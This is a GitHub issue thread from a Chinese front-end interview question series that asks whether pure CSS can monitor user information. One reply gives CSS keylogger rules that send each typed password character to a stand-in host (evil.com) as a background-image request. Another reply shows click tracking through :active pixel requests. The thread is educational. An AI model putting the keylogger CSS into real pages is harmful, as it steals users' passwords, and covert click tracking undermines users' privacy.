### ISSUE TITLE
[css] 第344天 使用纯css能否监控到用户的一些信息？怎么实现？

### ISSUE THREAD

**Issue by haizhilin2013** [haizlin/fe-interview#2126]
第344天 使用纯css能否监控到用户的一些信息？怎么实现？

[我也要出题](http://web.haizlin.cn/interview/)

**Comment by wheatup** [comment]
可以，著名的[css keylogger](https://github.com/maxchehab/CSS-Keylogging/blob/master/css-keylogger-extension/keylogger.css)：
```css
input[type="password"][value$="a"] {
  background-image: url("http://evil.com/api/a");
}

input[type="password"][value$="b"] {
  background-image: url("http://evil.com/api/b");
}

input[type="password"][value$="c"] {
  background-image: url("http://evil.com/api/c");
}

/* ...以此类推... */
```

当用户输入密码时，这段css会请求用户输入的字符对应的资源，远端服务器通过监视请求资源的顺序从而推断用户的密码。所以css也不是绝对安全的

**Comment by longhui520** [comment]
- 利用:active 伪类实现监控用户的点击
    ```css
    .button-1:active::after {
       content: url(./pixel.gif?action=click&id=button1);
      display: none;
    }
    .button-2:active::after {
        content: url(./pixel.gif?action=click&id=button2);
        display: none;
    }
  ```
